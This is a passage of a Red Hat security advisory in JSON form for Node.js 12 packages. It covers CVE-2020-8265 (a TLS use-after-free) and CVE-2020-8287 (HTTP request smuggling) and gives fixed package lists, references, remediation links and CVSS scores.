"AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", 